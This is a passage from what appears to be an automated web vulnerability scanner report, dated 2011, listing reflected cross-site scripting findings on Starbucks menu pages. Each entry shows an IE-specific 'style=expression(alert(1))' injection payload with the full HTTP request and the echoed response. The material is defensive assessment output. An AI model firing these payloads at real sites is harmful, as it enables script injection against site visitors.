The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4bbc"style="x:expression(alert(1))"9b2bce3bcc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:17 GMT
Connection: close
Content-Length: 42522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style="x:expression(alert(1))"9b2bce3bcc9=1"/>
...[SNIP]...

1.810. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/zen

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3af5b"style="x:expression(alert(1))"ab6cdbd263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/zen?3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:42 GMT
Connection: close
Content-Length: 42134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/zen?3af5b"style="x:expression(alert(1))"ab6cdbd263=1"/>
...[SNIP]...

1.811. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d939"style="x:expression(alert(1))"080e74fafa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:57 GMT
Connection: close
Content-Length: 41263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style="x:expression(alert(1))"080e74fafa0=1"/>
...[SNIP]...

1.812. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ace4c"style="x:expression(alert(1))"ab4d40a17c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:46 GMT
Connection: close
Content-Length: 41042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style="x:expression(alert(1))"ab4d40a17c7=1"/>
...[SNIP]...

1.813. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d51a"style="x:expression(alert(1))"b13ae9964f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:11 GMT
Connection: close
Content-Length: 41086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style="x:expression(alert(1))"b13ae9964f3=1"/>
...[SNIP]...

1.814. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d32a"style="x:expression(alert(1))"fa0c610012d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food?5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:35 GMT
Connection: close
Content-Length: 59312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?5d32a"style="x:expression(alert(1))"fa0c610012d=1"/>
...[SNIP]...

1.815. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/8-grain-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d050a"style="x:expression(alert(1))"19e1c1b3a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/8-grain-roll?d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:23 GMT
Connection: close
Content-Length: 44171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/8-grain-roll?d050a"style="x:expression(alert(1))"19e1c1b3a3d=1"/>
...[SNIP]...

1.816. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-bran-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b49f2"style="x:expression(alert(1))"d39bf9c38f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/apple-bran-muffin?b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:38 GMT
Connection: close
Content-Length: 44399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-bran-muffin?b49f2"style="x:expression(alert(1))"d39bf9c38f=1"/>
...[SNIP]...

1.817. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-fritter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31dd9"style="x:expression(alert(1))"86ccc93fdb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/apple-fritter?31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:02 GMT
Connection: close
Content-Length: 44539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-fritter?31dd9"style="x:expression(alert(1))"86ccc93fdb0=1"/>
...[SNIP]...

1.818. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/asiago-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2958"style="x:expression(alert(1))"253fd2ac0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/asiago-bagel?e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:43 GMT
Connection: close
Content-Length: 44137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/asiago-bagel?e2958"style="x:expression(alert(1))"253fd2ac0e8=1"/>
...[SNIP]...

1.819. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/banana-nut-loaf

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 608e6"style%3d"x%3aexpression(alert(1))"50409be2fad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 608e6"style="x:expression(alert(1))"50409be2fad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/banana-nut-loaf?608e6"style%3d"x%3aexpression(alert(1))"50409be2fad=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:13 GMT
Connection: close
Content-Length: 42886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/banana-nut-loaf?608e6"style="x:expression(alert(1))"50409be2fad=1"/>
...[SNIP]...

1.820. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/birthday-cake-mini-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36b15"style="x:expression(alert(1))"625aeb76d3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/birthday-cake-mini-doughnut?36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:32 GMT
Connection: close
Content-Length: 43794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut?36b15"style="x:expression(alert(1))"625aeb76d3a=1"/>
...[SNIP]...

1.821. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-oat-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d769"style="x:expression(alert(1))"3750d0b57de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/blueberry-oat-bar?8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:08 GMT
Connection: close
Content-Length: 43568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar?8d769"style="x:expression(alert(1))"3750d0b57de=1"/>
...[SNIP]...

1.822. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7708"style%3d"x%3aexpression(alert(1))"023b71db86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7708"style="x:expression(alert(1))"023b71db86f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/blueberry-scone?d7708"style%3d"x%3aexpression(alert(1))"023b71db86f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:53 GMT
Connection: close
Content-Length: 43585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-scone?d7708"style="x:expression(alert(1))"023b71db86f=1"/>
...[SNIP]...

1.823. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-streusel-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4f8c"style="x:expression(alert(1))"3533e46b66c in the application's response.

